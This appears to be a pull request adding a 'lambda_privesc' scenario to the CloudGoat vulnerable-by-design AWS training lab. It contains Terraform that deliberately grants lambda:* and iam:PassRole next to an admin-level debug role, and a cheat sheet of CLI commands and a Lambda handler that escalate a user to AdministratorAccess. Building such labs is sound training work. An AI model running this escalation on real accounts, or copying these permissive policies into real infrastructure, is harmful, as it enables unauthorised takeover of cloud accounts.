### PR TITLE
Scenario/lambda_privesc

### DIFF
--- a/README.md
+++ b/README.md
@@ -96,15 +96,7 @@ Starting with a highly-limited IAM user, the attacker is able to review previous
 
 [Visit Scenario Page.](scenarios/iam_privesc_by_rollback/README.md)
 
-### cloud_breach_s3 (Small / Moderate)
-
-`$ ./cloudgoat.py create cloud_breach_s3`
-
-Starting as an anonymous outsider with no access or privileges, exploit a misconfigured reverse-proxy server to query the EC2 metadata service and acquire instance profile keys. Then, use those keys to discover, access, and exfiltrate sensitive data from an S3 bucket.
-
-[Visit Scenario Page.](scenarios/cloud_breach_s3/README.md)
-
-### lambda_privesc (Small / Moderate)
+### lambda_privesc (Small / Easy)
 
 `$ ./cloudgoat.py create lambda_privesc`
 
@@ -113,6 +105,14 @@ Starting as the IAM user Chris, the attacker discovers that they can assume a ro
 > **Note:** This scenario may require you to create some AWS resources, and because CloudGoat can only manage resources it creates, you should remove them manually before running `./cloudgoat destroy`.
 
 [Visit Scenario Page.](scenarios/lambda_privesc/README.md)
+
+### cloud_breach_s3 (Small / Moderate)
+
+`$ ./cloudgoat.py create cloud_breach_s3`
+
+Starting as an anonymous outsider with no access or privileges, exploit a misconfigured reverse-proxy server to query the EC2 metadata service and acquire instance profile keys. Then, use those keys to discover, access, and exfiltrate sensitive data from an S3 bucket.
+
+[Visit Scenario Page.](scenarios/cloud_breach_s3/README.md)
 
 ### iam_privesc_by_attachment (Medium / Moderate)
 

--- a/README.md
+++ b/README.md
@@ -104,6 +104,16 @@ Starting as an anonymous outsider with no access or privileges, exploit a miscon
 
 [Visit Scenario Page.](scenarios/cloud_breach_s3/README.md)
 
+### lambda_privesc (Small / Moderate)
+
+`$ ./cloudgoat.py create lambda_privesc`
+
+Starting as the IAM user Chris, the attacker discovers that they can assume a role that has full Lambda access and pass role permissions. The attacker can then perform privilege escalation using these new permissions to obtain full admin privileges.
+
+> **Note:** This scenario may require you to create some AWS resources, and because CloudGoat can only manage resources it creates, you should remove them manually before running `./cloudgoat destroy`.
+
+[Visit Scenario Page.](scenarios/lambda_privesc/README.md)
+
 ### iam_privesc_by_attachment (Medium / Moderate)
 
 `$ ./cloudgoat.py create iam_privesc_by_attachment`

--- a/scenarios/lambda_privesc/README.md
+++ b/scenarios/lambda_privesc/README.md
@@ -2,7 +2,7 @@
 # Scenario: lambda_privesc
 
 **Size:** Small  
-**Difficulty:** Medium
+**Difficulty:** Easy
 
 **Command:** `$ ./cloudgoat.py create lambda_privesc`
 
@@ -20,7 +20,7 @@
 Acquire full admin privileges.
 ## Summary
 
-Starting as the IAM user Chris, the attacker discovers that they can assume a role that has full Lambda access and pass role permissions. The attacker can then perform privilege escalation using these new permissions to obtain full admin privileges.  
+Starting as the IAM user Chris, the attacker discovers that they can assume a role that has full Lambda access and pass role permissions. The attacker can then perform privilege escalation to obtain full admin access.  
 
 Note: This scenario may require you to create some AWS resources, and because CloudGoat can only manage resources it creates, you should remove them manually before running `./cloudgoat destroy`.
 
@@ -32,12 +32,12 @@ Note: This scenario may require you to create some AWS resources, and because Cl
 ## Walkthrough - IAM User "Chris"
 
 1. Starting as the IAM user "Chris",  the attacker analyses their privileges.
-2. The attacker realizes they are able to list IAM roles and assume role, and finds 2 interesting IAM roles: lambdaManager and debug.
-3. The attacker looks at the attached policies for the 2 IAM roles and realizes lambdaManager has full lambda access and pass role permissions while debug role has full administrator privileges.
+2. The attacker realizes they are able to list and assume IAM roles. There are two interesting IAM roles: lambdaManager and debug.
+3. The attacker looks at the attached policies for the two IAM roles and realizes lambdaManager has full lambda access and pass role permissions and the debug role has full administrator privileges.
 4. The attacker then tries to assume each role but realizes that they only have sufficient privileges to assume the lambdaManager role, and that the debug role can only be assumed by a Lambda function.
-5. The attacker now leverages on the lambdaManager role to perform a privilege escalation using Lambda.
-6. First, the attacker writes code which will attach the administrator policy to the "Chris" user.
-7. Next, using the lambdaManager role, the attacker creates a Lambda function, specifying the code in step 6, and passing the debug role.
-8. Lastly, using the lambdaManager role, the attacker invokes the Lambda function, causing the administrator policy to be attached to the "Chris" user and thus gaining full admin privileges.
+5. The attacker now leverages the lambdaManager role to perform a privilege escalation using a Lambda function.
+6. First, the attacker writes a script that will attach the administrator policy to the IAM user "Chris".
+7. Next, using the lambdaManager role, the attacker creates a Lambda function, specifying the code in step 6, and set the lambda execution role to the debug role.
+8. Lastly, using the lambdaManager role, the attacker invokes the Lambda function, causing the administrator policy to be attached to the "Chris" user and thus gaining full admin access.
 
 A cheat sheet for this route is available [here](./cheat_sheet_chris.md).

--- a/scenarios/lambda_privesc/README.md
+++ b/scenarios/lambda_privesc/README.md
@@ -1,0 +1,43 @@
+
+# Scenario: lambda_privesc
+
+**Size:** Small  
+**Difficulty:** Medium
+
+**Command:** `$ ./cloudgoat.py create lambda_privesc`
+
+## Scenario Resources
+
+1 IAM User  
+2 IAM Roles  
+
+## Scenario Start(s)
+
+1. IAM User Chris  
+
+## Scenario Goal(s)
+
+Acquire full admin privileges.
+## Summary
+
+Starting as the IAM user Chris, the attacker discovers that they can assume a role that has full Lambda access and pass role permissions. The attacker can then perform privilege escalation using these new permissions to obtain full admin privileges.  
+
+Note: This scenario may require you to create some AWS resources, and because CloudGoat can only manage resources it creates, you should remove them manually before running `./cloudgoat destroy`.
+
+## Exploitation Route(s)
+
+![Scenario Route(s)](https://app.lucidchart.com/publicSegments/view/f1b7a749-dee0-4645-b305-add2a025b9cc/image.png)
+
+
+## Walkthrough - IAM User "Chris"
+
+1. Starting as the IAM user "Chris",  the attacker analyses their privileges.
+2. The attacker realizes they are able to list IAM roles and assume role, and finds 2 interesting IAM roles: lambdaManager and debug.
+3. The attacker looks at the attached policies for the 2 IAM roles and realizes lambdaManager has full lambda access and pass role permissions while debug role has full administrator privileges.
+4. The attacker then tries to assume each role but realizes that they only have sufficient privileges to assume the lambdaManager role, and that the debug role can only be assumed by a Lambda function.
+5. The attacker now leverages on the lambdaManager role to perform a privilege escalation using Lambda.
+6. First, the attacker writes code which will attach the administrator policy to the "Chris" user.
+7. Next, using the lambdaManager role, the attacker creates a Lambda function, specifying the code in step 6, and passing the debug role.
+8. Lastly, using the lambdaManager role, the attacker invokes the Lambda function, causing the administrator policy to be attached to the "Chris" user and thus gaining full admin privileges.
+
+A cheat sheet for this route is available [here](./cheat_sheet_chris.md).

--- a/scenarios/lambda_privesc/cheat_sheet_chris.md
+++ b/scenarios/lambda_privesc/cheat_sheet_chris.md
@@ -19,9 +19,9 @@ Then add the lambdaManager credentials to your AWS CLI credentials file at `~/.a
 
 ```
 [lambdaManager]
-aws_access_key_id = asdasdasd
-aws_secret_access_key = asdasdsadas
-aws_session_token = asdasdasd
+aws_access_key_id = {{AccessKeyId}}
+aws_secret_access_key = {{SecretAccessKey}}
+aws_session_token = {{SessionToken}}
 ```
 python code:
 ````

--- a/scenarios/lambda_privesc/cheat_sheet_chris.md
+++ b/scenarios/lambda_privesc/cheat_sheet_chris.md
@@ -1,0 +1,39 @@
+`aws configure --profile Chris`
+
+`aws iam list-attached-user-policies --user-name chris-<cloudgoat_id> --profile Chris`
+
+`aws iam get-policy-version --policy-arn <cg-chris-policy arn> --version-id v1 --profile Chris`
+
+`aws iam list-roles --profile Chris`
+
+`aws iam list-attached-role-policies --role-name cg-debug-role-<cloudgoat_id> --profile Chris`
+
+`aws iam list-attached-role-policies --role-name cg-lambdaManager-role-<cloudgoat_id> --profile Chris`
+
+`aws iam get-policy-version --policy-arn <cg-lambdaManager-policy arn> --version-id v1 --profile Chris`
+
+`aws sts assume-role --role-arn <cg-lambdaManager-role arn> --role-session-name lambdaManager --profile Chris`
+
+
+Then add the lambdaManager credentials to your AWS CLI credentials file at `~/.aws/credentials`) as shown below:
+
+```
+[lambdaManager]
+aws_access_key_id = asdasdasd
+aws_secret_access_key = asdasdsadas
+aws_session_token = asdasdasd
+```
+python code:
+````
+import boto3
+def lambda_handler(event, context):
+	client = boto3.client('iam')
+	response = client.attach_user_policy(UserName = 'chris-<cloudgoat_id>', PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')
+	return response
+````
+
+`aws lambda create-function --function-name admin_function --runtime python3.6 --role <cg-debug-role arn> --handler code.lambda_handler --zip-file fileb://code.zip --profile lambdaManager`
+
+`aws lambda invoke --function-name admin_function out.txt --profile lambdaManager`
+
+`aws iam list-attached-user-policies --user-name chris-<cloudgoat_id> --profile Chris`

--- a/scenarios/lambda_privesc/manifest.yml
+++ b/scenarios/lambda_privesc/manifest.yml
@@ -1,0 +1,15 @@
+---
+  # The name of the scenario, alpha-numeric characters only, and underscore-separated
+- name: lambda_privesc
+  # The name of the author(s), comma separated
+- author: Ng Song Guan
+  # The version of the scenario, where major versions are breaking changes and minor are small fixes.
+- version: 1.0
+  # Text displayed to the user when they type "{{ scenario_name }} help"
+- help: |
+        Starting as the IAM user Chris, the attacker discovers that they can assume a role that has full Lambda access and pass role permissions.
+        The attacker can then perform privilege escalation using these new permissions to obtain full admin privileges.
+
+# Records the date upon which this scenario was last updated, in MM-DD-YYYY format
+- last-updated: 06-23-2020
+...

--- a/scenarios/lambda_privesc/terraform/data_sources.tf
+++ b/scenarios/lambda_privesc/terraform/data_sources.tf
@@ -1,0 +1,8 @@
+#AWS Account Id
+data "aws_caller_identity" "aws-account-id" {
+
+}
+#Administrator Policy
+data "aws_iam_policy" "administrator-full-access" {
+  arn = "arn:aws:iam::aws:policy/AdministratorAccess"
+}

--- a/scenarios/lambda_privesc/terraform/iam.tf
+++ b/scenarios/lambda_privesc/terraform/iam.tf
@@ -1,0 +1,122 @@
+#IAM User
+resource "aws_iam_user" "cg-chris" {
+  name = "chris-${var.cgid}"
+  tags = {
+    Name     = "cg-chris-${var.cgid}"
+    Stack    = "${var.stack-name}"
+    Scenario = "${var.scenario-name}"
+  }
+}
+
+resource "aws_iam_access_key" "cg-chris" {
+  user = aws_iam_user.cg-chris.name
+}
+
+# IAM roles
+resource "aws_iam_role" "cg-lambdaManager-role" {
+  name = "cg-lambdaManager-role-${var.cgid}"
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Action": "sts:AssumeRole",
+      "Principal": {
+        "AWS": "${aws_iam_user.cg-chris.arn}"
+      },
+      "Effect": "Allow",
+      "Sid": ""
+    }
+  ]
+}
+EOF
+  tags = {
+    Name = "cg-debug-role-${var.cgid}"
+    Stack = "${var.stack-name}"
+    Scenario = "${var.scenario-name}"
+  }
+}
+
+resource "aws_iam_role" "cg-debug-role" {
+  name = "cg-debug-role-${var.cgid}"
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Action": "sts:AssumeRole",
+      "Principal": {
+        "Service": "lambda.amazonaws.com"
+      },
+      "Effect": "Allow",
+      "Sid": ""
+    }
+  ]
+}
+EOF
+  tags = {
+    Name = "cg-debug-role-${var.cgid}"
+    Stack = "${var.stack-name}"
+    Scenario = "${var.scenario-name}"
+  }
+}
+
+# IAM Policies
+resource "aws_iam_policy" "cg-lambdaManager-policy" {
+  name = "cg-lambdaManager-policy-${var.cgid}"
+  description = "cg-lambdaManager-policy-${var.cgid}"
+  policy =<<EOF
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "lambdaManager",
+            "Effect": "Allow",
+            "Action": [
+                "lambda:*",
+                "iam:PassRole"
+            ],
+            "Resource": "*"
+        }
+    ]
+}
+EOF
+}
+
+resource "aws_iam_policy" "cg-chris-policy" {
+  name = "cg-chris-policy-${var.cgid}"
+  description = "cg-chris-policy-${var.cgid}"
+  policy =<<EOF
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "chris",
+            "Effect": "Allow",
+            "Action": [
+                "sts:AssumeRole",
+                "iam:List*",
+                "iam:Get*"
+            ],
+            "Resource": "*"
+        }
+    ]
+}
+EOF
+}
+
+#Policy Attachments
+resource "aws_iam_role_policy_attachment" "cg-debug-role-attachment" {
+  role = aws_iam_role.cg-debug-role.name
+  policy_arn = data.aws_iam_policy.administrator-full-access.arn
+}
+
+resource "aws_iam_role_policy_attachment" "cg-lambdaManager-role-attachment" {
+  role = aws_iam_role.cg-lambdaManager-role.name
+  policy_arn = aws_iam_policy.cg-lambdaManager-policy.arn
+}
+
+resource "aws_iam_user_policy_attachment" "cg-chris-attachment" {
+  user = aws_iam_user.cg-chris.name
+  policy_arn = aws_iam_policy.cg-chris-policy.arn
+}

--- a/scenarios/lambda_privesc/terraform/outputs.tf
+++ b/scenarios/lambda_privesc/terraform/outputs.tf
@@ -1,0 +1,11 @@
+#IAM User Credentials
+output "cloudgoat_output_chris_access_key_id" {
+  value = aws_iam_access_key.cg-chris.id
+}
+output "cloudgoat_output_chris_secret_key" {
+  value = aws_iam_access_key.cg-chris.secret
+}
+#AWS Account ID
+output "cloudgoat_output_aws_account_id" {
+  value = data.aws_caller_identity.aws-account-id.account_id
+}

--- a/scenarios/lambda_privesc/terraform/provider.tf
+++ b/scenarios/lambda_privesc/terraform/provider.tf
@@ -1,0 +1,4 @@
+provider "aws" {
+  profile = var.profile
+  region = var.region
+}

--- a/scenarios/lambda_privesc/terraform/variables.tf
+++ b/scenarios/lambda_privesc/terraform/variables.tf
@@ -1,0 +1,25 @@
+#Required: AWS Profile
+variable "profile" {
+
+}
+#Required: AWS Region
+variable "region" {
+  default = "us-east-1"
+}
+#Required: CGID Variable for unique naming
+variable "cgid" {
+
+}
+#Required: User's Public IP Address(es)
+variable "cg_whitelist" {
+  type = list
+
+}
+#Stack Name
+variable "stack-name" {
+  default = "CloudGoat"
+}
+#Scenario Name
+variable "scenario-name" {
+  default = "lambda-privesc"
+}


### PR DESCRIPTION
This is a relatively straightforward scenario which mainly involves privesc with lambda (no. 15  https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/). The attacker has to first enumerate roles and their permissions, then assume a role with full lambda permissions to perform the lambda privesc, in order to obtain full admin privileges.
Do let me know if this scenario is too simple / areas for improvement. Thanks!